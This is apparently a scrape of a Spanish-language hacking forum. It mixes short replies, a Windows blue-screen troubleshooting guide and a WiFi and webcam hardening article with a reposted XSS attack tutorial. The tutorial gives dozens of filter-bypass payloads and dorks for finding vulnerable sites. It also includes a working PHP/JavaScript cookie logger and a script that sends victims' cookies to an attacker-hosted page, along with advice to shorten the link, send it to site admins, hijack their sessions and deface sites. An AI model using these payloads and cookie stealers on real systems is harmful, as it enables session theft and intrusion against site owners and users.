Yo creo q antes el monopolio de las empresas lo acaparaba Microsoft, pero con los años y la evolución de LINUX, la mente de las empresas se ha ido abriendo, y como linux es muy competente, te ahorras muchísimo en licencias, como dijo Antrax.

Al final la cuestión es que si te ofrecen un sistema operativo gratuito, ( o casi), y un windows q las licencias valen un cojón, y no te garantizan seguridad pues....


P.D: en mi empresa usamos windows server 2008

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
A mi me pasa pero en Firefox, en Chrome me va bien.. No logro encontrar la solucion..
Lo curioso es que a penas instalo el SMF funciona perfecto, pero al otro dia, ya no anda mas..

Codificación utf-8 ?

Downloading! Graxe!

Buena TooL, gracias  [Q]3rV[0] !!

La pantalla azul aparece en Windows cuando se produce un error grave. Es tan temida que se le apellida pantalla azul de la muerte. Pero a menudo tiene una solución bastante simple.

Casi siempre se debe a un driver defectuoso o a algún problema con los dispositivos u otro hardware. Pero también puede tener otras causas.

Prueba estas soluciones en el orden en que las pongo.

1. Vuelve a la configuración que funcionaba

Windows arrancará con la más reciente configuración de drivers y registro del sistema que no dio problemas. Eso puede resolver lo que ha causado el fallo.
Apaga el PC. Lee este paso completo antes de hacer lo que indico y encenderlo de nuevo. Vas a tener que pulsar la tecla F8 repetidamente hasta ver una pantalla de fondo negro con las opciones de arranque avanzadas.

Empieza a pulsar F8 en cuanto le des al botón de encendido. No esperes ni un segundo. Si aparece el logo de Windows perderás la oportunidad.

Usa las flechas del teclado para elegir la opción de arrancar con La última configuración válida/buena conocida. Pulsa Intro.

2. Recupera el driver anterior

Cuando la pantalla azul sale después de actualizar un driver de un dispositivo, es casi seguro que ahí esté el problema.

Reinicia el PC en modo seguro.
Sigue las instrucciones para recuperar el driver anterior del dispositivo que esté provocando el fallo. Eso desinstala el controlador nuevo que da problemas y reinstala el que hubiera antes (que en principio debía funcionar).

3. Restaura el sistema

Puede resolver errores debidos a drivers o a programas defectuosos.

Elige volver a un punto de restauración previo a la instalación del dispositivo o del programa que falla. O regresa a un punto en que todo funcionaba bien.

Ve cómo restaurar el sistema en:

Windows 7
Windows XP
Windows Vista

IMPORTANTE:

¿No consigues entrar en el PC porque el fallo es demasiado grave? Usa la opción de Restaurar sistema de la herramienta para reparar Windows (sólo Windows 7).


4. Actualiza los drivers

Cuando no tengas claro qué dispositivo está fallando, prueba a descargar los drivers de todos ellos y ponlos al día.

5. Revisa el disco duro y la RAM

Los problemas en ellos son otras dos causas comunes de las pantallas azules. Sobre todo los de la memoria RAM.

Hay buenas opciones de corregir los errores del disco si no tiene una avería mecánica. Basta usar una herramienta que incluye Windows. El chequeo de la RAM te dirá si hace falta o no que la sustituyas.

Reparar el disco duro y testear la memoria

6. Pon al día tu motherboard o placa base

Quizá no admita el dispositivo aunque sus drivers sean los adecuados. Una solución posible es descargar drivers de la motherboard actualizados.

7. Comprueba que no tienes un virus

Algunos pueden infectar el sector de arranque del disco y provocar errores de pantalla azul o impedir que Windows se cargue. No está de más comprobarlo.

Usa Microsoft Security Essentials si no tienes ningún antivirus instalado. Es gratis.

8. Actualiza Windows

Usa Windows Update para instalar las actualizaciones y Service Pack más modernos de tu Windows. A menudo corrigen bugs que dan lugar a errores graves.

Ve cómo:

Actualizar Windows 7
Actualizar XP:
Entra en Inicio -> Todos los programas -> Windows Update

Instala lo que te pida el sitio web. Luego usa la opción Personalizada para descargar tanto las actualizaciones opcionales como las de alta prioridad.
Actualizar Windows Vista:
Sigue el enlace de arriba de Windows 7. El procedimiento es muy parecido.

9. Repara Windows

No perderás nada de lo que haya en tu disco. El proceso sólo reinstala elementos que tienen que ver con el sistema.

Reparar Windows 7 (reparación de inicio)
Reparar Windows XP (en inglés)
Reparar Windows Vista (en inglés)

10. Restaura la BIOS a la configuración de fábrica

Los cambios inadecuados en la BIOS pueden provocar fallos. También tenerla configurada para un máximo rendimiento (overclocking) si tiene esa opción.

Entra en la BIOS.
Cambia los parámetros de la BIOS. Sigue el enlace y ve al apartado La BIOS Setup. Muestra sus opciones habituales.

NOTA:
El modo concreto de cargar las configuraciones de fábrica (Default) o el nivel de overclocking varía de unas BIOS a otras.

11. Descifra el código del error

Busca en la pantalla azul el texto STOP. Apúntate el código de error que aparece a su derecha (ve la imagen de arriba). Empieza siempre por 0x (por ejemplo, 0x00000098).

Haz una búsqueda en Google de ese código de error. Otros han podido sufrirlo y encontrado una solución. Añade más detalles en tu búsqueda si hace falta, indicando el modelo de tu PC junto al código del error. Algo del estilo de "stop 0x00000098 sony vaio".

12. Comprueba los componentes de la placa

La idea es asegurarse de que todo está bien conectado. Me refiero a las tarjetas de vídeo y audio, módulo/s de memoria RAM, cables de conexión, etc. A veces se aflojan y provocan un mal contacto eléctrico que causa el error en Windows.

IMPORTANTE:

Recolocar los componentes de hardware implica cierto riesgo. Si lo haces mal, puede ser peor el remedio que la enfermedad. Busca ayuda en caso necesario.

Desenchufa SIEMPRE el PC de la corriente ANTES de abrirlo.
Sigue estos tutoriales con imágenes (en inglés) sobre cómo...

Recolocar las tarjetas de la placa
Recolocar los módulos de RAM
Recolocar los conectores de discos duros y dispositivos

13. Actualiza la BIOS

Busca la ayuda de un experto o hazlo tú con extrema precaución. Si corre mal puede dejar inservible el PC.

Descubre la marca y el modelo de tu placa y la versión de la BIOS.
En el enlace que incluyo ahora te digo que no descargues los drivers de la BIOS. Pero en este caso SÍ tienes que hacerlo. Sigue al pie de la letra las instrucciones para actualizarla que indique cada fabricante.

Descarga actualizaciones de la BIOS de tu placa

14. Haz de detective

Desconecta todos los dispositivos externos conectados al PC, excepto el teclado y el monitor.
Reconéctalos UNO A UNO. Si aparece la pantalla azul tras hacerlo sabrás que ese dispositivo es el culpable. Lo más probable es que tenga un problema físico o que sea incompatible con tu versión de Windows. Comprueba su compatibilidad o llévalo a un servicio técnico.
Lo ideal es que probaras a sustituir uno a uno también los otros componentes del PC: las tarjetas de vídeo y audio, el disco duro, el teclado, el monitor, la RAM, la CPU o hasta la propia motherboard. Pero es improbable que los tengas todos por duplicado.

Llegado a este punto, la alternativa más cabal es llevar tu equipo a un servicio de reparación.

DESCARGA:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Muy buena tío! Se agradece! Excelente!

El vídeo está cojonudo, pero el cartél de hacking ético, así tan simple, contrarresta, pero muy guapo tio enhorabuena!

Saludos.

El peor de todos Zapatero...

También puedes crear una app, con malware, subirla a un server de descargas, colársela a la víctima, y tener acceso total al sistema.... Todo muy lícito... xD

Esto está muy hot! Gracias Stiuvert!

¿Qué es XSS?

XSS es sinónimo de Cross-Site-Scripting. Se trata básicamente de un ataque, que se utiliza para ejecutar código HTML y Javascript en la página web. Este ataque puede hacerse mediante la presentación de consultas en cuadros de texto, o incluso en la barra de direcciones  URL. Los resultados vuelven a leer el texto como HTML, por lo que ejecuta las secuencias de comandos en lugar de mostrarlas como texto sin formato. Con un ataque XSS, usted puede robar las cookies de un Web-Administrador, o incluso utilizar algunos de ingeniería social para manipular a alguien a descargar un virus que ha creado. Tal como botnet, o RAT, tal vez incluso un Keylogger. XSS pueden ser muy peligrosos, pero también pueden ser muy leves. La mayoría de mis ataques son ataques XSS leves, que pueden ser difíciles de utilizar en contra de un sitio web.

Hay muchas maneras de utilizar XSS a su ventaja. Voy a citar algunos ejemplos. Puede utilizar un cuadro de alerta para hacer publicidad usted mismo, o alertar a la web-admin que ha descubierto un fallo de seguridad que implica XSS. También puede configurar un Cookie-Stealer/Logger. Cualquier cosa que usted puede hacer con HTML, puede ser utilizado en contra de un sitio con este ataque. Voy a explicar algunos de los términos más importantes relacionados con XSS.

¿Qué es el HTML y Javascript?

HTML

HTML es algo así como un lenguaje de programación. Las diferencias entre un lenguaje de programación y HTML, no están demasiado lejos. Ellos son los dos idiomas, que se utilizan para crear atributos y eventos. HTML es un lenguaje de marcas, que se utiliza principalmente para crear sitios web. HTML significa Hyper-Text Markup Language. Puedes usar HTML para crear formularios, botones y otras cosas que se pueden utilizar en una página web. Dudo mucho que se puedan encontrar un sitio web que no contenga incluso una pequeña cantidad de código HTML.

Javascript

Ahora, en primer lugar, vamos a dejar una cosa clara. Hay una gran diferencia entre Java y JavaScript. Java es un lenguaje que ressembles a C + +, que puede ser utilizado en los juegos, y aplicaciones. Javascript es algo similar al HTML, pero sin duda diferentes en muchos aspectos. Javascript no se utiliza casi la misma cantidad de páginas web que HTML es. Javascript se utiliza, más en aplicaciones fuera de las páginas web. Al igual que los archivos PDF. Javascript puede ser un idioma muy útil junto con HTML. Ambos son bastante simples de aprender y son muy dinámicos.

XSS: Mi primer ataque.

Ahora, vamos a empezar a meterse en las cosas realmente buenas. En esta sección, voy a estar explicando cómo utilizar XSS a su ventaja. También vamos a lanzar nuestro primer ataque de XSS, si usted sabe lo básico a XSS, puede saltarse esta sección, porque dudo que usted aprenderá todo lo que usted no sabe brevemente todavía.

Ahora, nuestro primer paso, obviamente encontrar un sitio vulnerable. Encontrar un sitio vulnerable a XSS es mucho más fácil que encontrar un sitio vulnerable a SQLi. El problema es que puede tomar tiempo para determinar si el sitio es realmente vulnerable. Con SQLi, puedes añadir un poco '. Pero en XSS, debe presentar (a veces) varias consultas, para probar su sitio para XSS.

Los sitios más vulnerables contendrán una búsqueda, Login, o un área de registro. Prácticamente en cualquier lugar que contiene un cuadro de texto, se puede explotar con XSS. Sin embargo, muchas personas se olvidan de este hecho, y nunca lo usan todo su potencial porque piensan que es inútil. Puede explotar XSS través del aswell fuente. No se puede tomar cualquier secuencia de comandos y editar la cosa completa. Sin embargo, la edición de una secuencia de comandos "onmouseover", es sin duda una excepción. Voy a explicar este método de XSS más adelante, por ahora, tenemos las bases completas.

De todas formas, nuestro sitio debe tener algunos cuadros de texto para introducir algo de HTML pulg Simplemente va a utilizar una barra de búsqueda.

Por lo tanto, tratemos de poner en el más conocido, consulta básica de todos los tiempos.

<script>alert("XSS")</script>

Ese pequeño guión, es HTML. Hará un pequeño mensaje emergente diciendo "XSS". Puede editar esa parte, si quieres. Eso sí, no editar cualquier otra parte de la secuencia de comandos. Poner esto en la barra de búsqueda y pulsa enter. Ahora, si un cuadro de alerta poco apareció, que ha atacado con éxito un sitio vulnerable a XSS! Si no hay ningún cuadro apareció, eso está bien, porque eso significa que el sitio se ha tomado un tiempo para poner en un filtro.

Un filtro, es cuando buscamos algo, entonces se pasa a través de un mini proceso, básicamente, una inspección. Comprueba si hay alguna cosas maliciosas (peligrosos). En este caso, se buscará XSS. A veces, estos filtros son muy débiles, y puede ser pasado por alto fácilmente, otras veces, pueden ser muy difíciles de pasar por alto. Hay un montón de maneras de eludir un filtro XSS. En primer lugar, tenemos que averiguar lo que el filtro se bloquea. Una gran parte del tiempo, se Blockin la alerta. He aquí un ejemplo de este tipo de filtro:

<script>alert("XSS")</script>

>

<script>alert( > XSS DETECTED < )</script>

Se bloqueará las comillas. Entonces, ¿cómo diablos qué nos pasamos eso? Bueno, por suerte hay una manera de cifrar el mensaje completo . Nosotros vamos a usar un poco la función llamada "String.fromCharCode". El nombre de la misma explica casi todo. Se cifra el texto en ASCII. Un ejemplo de este cifrado, sería así:

String.fromCharCode(88,83,83)

Sí, puede ser un poco confuso, pero con un poco de explicar y probar, es muy simple. Esto es lo que nuestra consulta completa se verá así:

<script>alert(String.fromCharCode(88,83,83))</script>

Usted no necesita ninguna cita en la consulta simple como eso. Así que vamos a poner ese nuevo en la barra de búsqueda, y ¡voilá! ¡Funcionó! Tenemos un cuadro de alerta que dice "XSS"! Si usted todavía no recibió ningún mensaje de alerta, pruebe algunas de estas preguntas que me gusta usar:

"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

Sí, acabo de escribir todos aquellos abajo, y tardó más de lo que debería haber, pero todo el trabajo a su manera, por lo que intento ya que muchos de ellos como sea posible. He atacado algunas bastante grandes sitios con algunas de esas consultas. Creo mis propias consultas a veces, es necesario crear algunos demasiado, puede ser útil mucho.

XSS: Métodos Avanzados

Ahora, en esta sección voy a compartir algunas maneras de utilizar XSS maliciosamente en contra de un sitio. Ahora, tenga en cuenta todos los ataques maliciosos envían a través de un sistema, un sitio o servidor, es ilegal y puede ser procesado por estas acciones. Por lo tanto, use siempre protectores si usted está pensando en hacer algo malicioso en el sitio. Si quieres hacer una pequeña caja de alerta pop up, que no es necesario un Proxy / VPN.

Robo de cookie / Inicio de sesión

Ahora, robo de cookies es de lo más dañino que podemos hacer con XSS no persistente. Un ladrón / logger galleta, registrará las cookies de los usuarios que acceden a la página de un determinado documento. La forma más sencilla de hacerlo, sería con un proceso de tres pasos.

En primer lugar, debe configurar un sitio. Personalmente, creo que lo mejor para You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login código carga maliciosa, programas o cualquier otra cosa. Así que adelante y registrarse allí.

Ahora, una vez que haya creado su sitio, vaya a el administrador de archivos. Crear un nuevo archivo. Llámelo "CookieLog.txt". Deje en blanco el código. Ahora, cree otro archivo después de eso, se llama "CookieLogger.php". En CookieLogger.php, tenemos que añadir algo de código, para que envíe las cookies que se registro, en nuestra galleta Log. Agregue este código, en ella (Sólo asegúrese de que el nombre de archivo tiene. Php, o de lo contrario no se ejecutará el código PHP (que es un problema enorme).

<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen ([email protected])
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>

Ahora que tenemos nuestro script Logger Cookies, podemos enviar el registrador cookie para nuestro mejor amigo, el Web-Admin. Para ello, deberíamos Tiny la URL. O si usted puede encontrar la manera de falsificar la URL, que funcionará también.

Para el Tiny URL, vaya a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y sólo hay que poner en la URL. Pero espera una, tenemos que añadir un script en nuestra vulnerabilidad XSS. Este es el guión que se iniciará el registro de cookies.

<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

Entonces sólo tiene que añadir que el guión después de la URL, entonces pequeña, y envíelo a nuestro Web-Admin, ahora esto puede tomar algún tiempo para que el administrador de hecho clic en él. A veces, la Administración no haga clic en él, por lo que si se tarda demasiado tiempo, sólo debe darse por vencido y buscar otra forma de explotarlo.

Una vez que obtenga la cookie, puede utilizar "Cookie Manager" addon de Firefox para manipular y editar las galletas para que pueda secuestrar la sesión de los administradores. Me parece Cookies Administrador una aplicación muy útil para XSS, asegúrese de que lo descargue.

DEFACING

DEFACING es una de las cosas más comunes que las personas les gusta hacer cuando no tienen acceso a múltiples opciones de administrador. Sobre todo, para que puedan anunciarse a sí mismos, y simplemente dejar que el administrador sabe que su seguridad ha sido violada. De todas formas, desfigurar con XSS requiere XSS persistentes, tal vez un cuadro de comentarios, o algo así. Puede utilizar esta secuencia de comandos para crear un re-dirigir a su página de desfigurar (Probablemente debería redirigir a tus desfigurar el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, porque es subir el anonimato.)

<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>

XSS: Onmouseover

Onmousover no es una vulnerabilidad muy explotable. Pero, sin embargo, todavía se considera XSS. Una vulnerabilidad onmouseover sería algo como esto:

onmouseover=prompt1337

Podemos explotar esto, editando...:

onmouseover=alert("XSS")

Vulnerabilidad muy básico, pero cada vez es más cuenta, y parcheado en muchos más sitios web. La mayoría de los sitios usarán Adobe Flash o CSS para hacer ese tipo de efectos ahora.



XSS Técinas con filtro bypassing

A veces una simple consulta XSS no hará el truco. La razón de su consulta no funciona, se debe a que el sitio web tiene un conjunto WAF o filtro en su lugar. Un filtro bloqueará la mayor cantidad XSS y consultas sqli como sea posible. En este caso, estamos tratando con XSS.

Hay muchas maneras de pasar por filtros XSS, pero sólo me explicarán algunos.

Hex ByPassing

Con caracteres bloqueados como>, <, y /, es muy difícil de ejecutar una consulta de XSS. No te preocupes, siempre hay una solución Usted puede cambiar sus personajes, en hexadecimal. Un hexagonal de un cierto carácter, es básicamente el carácter, pero en un formato diferente. Estos le ayudarán a:

> =% 3c
<% = 3c
/ =% 2F

ASCII ByPassing

Con una codificación ASCII, podemos utilizar el carácter "que se bloquea un poco Esta es una de la más común de filtro XSS no pasa de todos los tiempos Una secuencia de comandos que usted necesita para cifrar, se vería así...:

SCRIPT OFF

<script>alert("XSS")</script>

SCRIPT ON

<script>alert(String.fromCharCode(88,83,83))</script>

Para cifrar la pequeña parte de una secuencia de comandos, vaya a este sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login yo uso ese sitio, y lo encuentro muy útil.

Case-Sensitive ByPassing

Este tipo de derivación no funciona casi nunca, pero siempre vale la pena intentarlo. Algunos filtros se establecen en el lugar para detectar ciertas secuencias, sin embargo, las cadenas del filtro que se bloquean entre mayúsculas y minúsculas. Así que todo lo que tenemos que hacer, es ejecutar una secuencia de comandos, con diferentes tamaños de caracteres. Esta derivación, se vería así:

<ScRiPt>aLeRt("XSS")</ScRiPt>

También se puede mezclar eso con cifrado ASCII, si quieres. Este tipo de derivación sólo funciona en los filtros realmente estúpidas, o los muy muy viejo.

XSS DORKS

Por lo general es mejor para crear / buscar sus propios idiotas, pero en este tutorial, voy a escribir algo bien rápido para compartir:

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

Esas dorks son casi tan básico como se puede conseguir, lo siento si no te satisfacen. Yo rara vez uso dorks, y con este tutorial que no es necesario utilizar dorks de encontrar un sitio vulnerable. XSS es una vulnerabilidad muy popular.


Saludos!!


FUENTE: calebucker

Me imagino que lo que borraste, sería el programa q te gestiona las  conexiones de tu tarjeta wifi.

Mete el cd o baja el soporte de internet y reinstalas, no tiene más.

Saludos.

Hazte una idea.

DEBIAN!!!!

Bienvenido tío!!! Amunt Valencia!! xD

Bienvenido tío!! Ponte cómodo!!!

SAludos!

Asegurar tu red WiFi para que no te graben con tu webcam.

Esta semana, con la noticia del pedófilo que espiaba a sus vecinos por la webcam se ha creado mucho ruido mediático en televisiones, radios y medios de comunicación. La noticia ha sido que se colaba en las redes WiFi de su vecino, tomaba el control del equipo de la víctima y les infectaba con un troyano para activar la webcam y grabarles en su casa, lo que a muchos les parecía de ciencia ficción. Esto es porque no están al día y no conocen casos como el del técnico de Mac que espiaba a sus clientes por la webcam, que los ladrones de tecnología caen en estas grabaciones y no saben que hasta a los espías les cazan de esta forma, así que quería escribir un poco sobre esto.


Defenderse contra la grabación en WebCam

Respecto al tema del software R.A.T. (Remote Administration Tool) que te graba con la webcam, ya es muy conocido, y las recomendaciones son cuidar de tu sistema operativo. En uno de los libros que más se han vendido de nuestra colección, Sergio de los Santos (@ssantosv) se pasa más de 250 páginas hablando de cómo obtener la Máxima Seguridad en Windows sin necesidad de utilizar un antimalware - el cual es archirecomendable para saber más de seguridad -, pero para resumir todo en una pequeña lista yo os propondría.

- Actualiza todo el software de tu equipo: No sé ni cuantas veces hemos hablado de esto, pero es que es verdad, hay que hacerlo. Para que el atacante pudiera tener control de tu máquina necesitaría saber las claves o explotar un bug al estilo de un pentester con Metasploit, así que evita que tenga bugs que explotar. Si lees este ejemplo te darás cuenta de que basta con que tengas el Flash sin actualizar y ... adios equipo. Actualiza el software de tu equipo o entrégalo al enemigo.

- Pon contraseñas robustas: Si no puede explotar un bug, evita que tus claves puedan ser adivinadas porque sean una basura, así que ten una política de claves seguras y cámbialas periódicamente.

- Usa un antimalware: Un antimalware reconoce casi todo el software comúnmente utilizado por ciber-acosadores para grabar con la webcam, así que ponte uno bueno con protección en tiempo real. Esto es también para ti que tienes Mac OS X y has oído que no hay malware en Mac OS X. Aquí tienes algunos tips para sobre cómo saber si tienes malware en tu Mac.

- Tapa la webcam y el micro: Lo mejor en estos casos es la seguridad física, así que como ya os he dicho muchas veces, tapa la webcam o ponte sexy para salir en Internet. Recuerda que las grabaciones tuyas se venden, tanto si estás desnudo como si no, porque muchos acosadores compran vídeos de gente haciendo cosas normales para engañar a sus víctimas. No te fies de un extraño ni aunque lo veas por la webcam.

- Deshabilitar la webcam en el sistema: Se puede deshabilitar la webcam por software en el sistema operativo, pero si el malware corre con privilegios en el sistema podría habilitar tanto la webcam como el sistema. Ojo, mucha gente se pierde a la hora de volver a habilitar los dispositivos multimedia en Windows.

- Usa webcams con tapa y luces: Muchas webcams tienen una tapa de privacidad, y otras tienen luces de aviso. Algunas de estas cámaras con luces de aviso no se iluminan cuando se sacan fotos, pero si el atacante no sabe si tiene luz o no, entonces se verá la luz encendida si alguien se conecta.

Asegurar tu WiFi contra la intrusión no deseada

Proteger tu red WiFi es algo que debes hacer sí o sí. Para ello, hace ya más de 6 años publiqué una serie de artículos por aquí sobre Cómo proteger tu red WiFi. En esos artículos os hablaba de como funciona WEP, WPA, WPA-PSK y cómo acabar montando WPA-Enterprise con un servidor Radius de Windows. Para que te pongas una red de los más robusta. Para un entorno de usuario doméstico este sería el resumen de cosas que deberías tener en cuenta en cuatro areas diferentes:

1) Fortificar la configuración de la red WiFi

- Establece cifrado WPA/WPA2 - PSK: Es lo más robusto que hay hoy en día, aunque no es ni mucho menos infalible, ya que existen formas de atacar un red con WPA/WPA2-PSK, pero es lo más que podemos tener en cuanto a cifrado de red en entornos domésticos.

- Cambia el SSID: El SSID es el nombre de la red, y los SSID son necesarios para poder crackear WPA/WPA2-PSK con ataques de diccionario, así que si pones uno que nadie haya pre-calculado antes, mejor que mejor.

- Cambia la clave por defecto: Las redes WPA/WPA2 - PSK también se atacan por el descubrimiento de los algoritmos que usaron los fabricantes para establecer claves por defecto.
Herramientas como Liberad a WiFi o el archifamoso e histórico WLanDecrypter se hicieron muy populares por hacer esto, pero hay muchas como WLanAudit, iWep y un largo etcétera para algoritmos de claves de redes WiFi de routers de todo el mundo.


- Oculta el SSID: Al ocultar el SSID de tu red haces que tu punto de acceso WiFi no emita los beacon frames con el nombre de la red. Ocultarlo hace que sea un paso más de trabajo para el atacante descubrir los Probe de los clientes que se conectan, pero evita curiosos. Para ello, asegúrate de marcar la opción de "Conectar a esta red aún cuando no se detecte" en la configuración de la rede WiFi en tu sistema operativo.

- Cambia periódicamente el SSID y la clave: Aunque no te lo creas, aún así te pueden crackear la red, así que cambia de vez en cuanto estos valores para que no acabe tu configuración publicada en bases de datos de Wardriving. Estas bases de datos comparten las claves de redes WiFi geoposicionadas como WiFiGet, y algunas soluciones hasta usan Four Square, por lo que para cualquier que pase por allí podría venirle bien tu red WiFi.

- Desactiva WPS (WiFi Protected Setup): Esta característica permite que un equipo se conecte a la WiFi utilizando un código temporal que simplifica todo el proceso de "enrollment" de un nuevo equipo. Por desgracia las implementaciones de muchos routers no detectan los ataques de fuerza bruta y en unos minutos están en tu red WiFi. Así que desactívalo y evita estos ataques de un tirón.

- Filtra por direcciones MAC de conexión: Tampoco es una medida definitiva, pero complica un poco más el trabajo del atacante, y ayuda localizar mejor a los atacantes. Para ello, en el panel de administración crea un filtro por dirección MAC para todos los equipos de tu red doméstica.

- WPA/WPA2 - Enterprise: Si quieres quitarte de problemas en la rede tu empresa, pues piensa en utilizar WPA2 Enterprise con EAP-TLS, TLS-EAP-TLS, PEAP-TLS, o PEAP-MSCHAPv2 o algo similar para que tu red sea mucho más difícil de atacar.

- Apaga la WiFi cuando no la usas: Cuanto menos cómoda sea la red para cualquier atacante mejor. Menos tiempo tendrá para atacarla y menos podrá disfrutarla.

2) Fortificar la configuración de tu router WiFi

- Actualiza el firmware de tu AP: No solo tienes que actualizar el software de tu equipo, sino también el software de tu router o punto de acceso. Para ello busca en la web del fabricante y pon el último que haya disponible para tu hardware.

- Cambia la contraseña de administración de tu punto de acceso: Las passwords por defecto son un grave problema en estos dispositivos, así que procura cambiarla. Ya vimos como incluso desde un correo electrónico era posible atacar un router AP aprovechando alguna de las múltiples vulnerabilidades de CSRF que suelen tener.

- No permitas la consola de administración en la WAN: Ni la consola de administración WAN, ni la consola de comandos vía Telnet o SSH. Deja que solo alguien conectado a la LAN pueda configurar las características de tu dispositivo.

- Configura el Firewall de Internet y Filtra por IP: Evita que desde Internet se puedan conectar a los equipos de tu red a ningún puerto, y sobre todo evita configuraciones en las que envíes todo el tráfico de Internet a un equipo de la red, ya que lo van a brear. Si aparte de filtrado MAC, quitas el servidor DHCP y filtras por dirección IP de cliente, se lo pondrás un poco más difícil al atacante, aunque configurar y administrar tu red se hará un poco más trabajoso.

3) Fortificar la conexión desde el cliente

- Valida el BSSID de tu red WiFi: Los sistemas operativos Windows validan el BSSID, es decir, que no ha cambiado el identificador de la red que depende de la dirección MAC. Esto es así para evitar suplantación de routers y ataques de Rogue AP. En el caso de Mac OS X no se valida el BSSID y tampoco en los sistemas operativos iOS de iPhone o iPad.

- Utiliza una conexión VPN: Tanto si la red es tuya como si no, estar en una red WiFi compartida es como "living in the jungle", así que tira una VPN para evitar que alguien te intercepte cualquier comunicación. Recuerda el ejemplo de hackeando al vecino hax0r que me roba la WiFi y todos los ataques en redes IPv4 & IPv6 que se pueden hacer.


- Configura el Firewall de tu sistema operativo: Una vez que abres la VPN, el firewall del tu router no va a ayudarte, así que tienes que tener el de tu sistema operativo activo y restringiendo todos los protocolos de entrada a tu equipo. Si tienes un equipo Windows, selecciona la opción de "Red Pública" en le perfil de la conexión, que es el más restrictivo de todos - si solo vas a conectarte a Internet - y configura en detalle luego tu firewall.

4) Monitoriza la red periódicamente

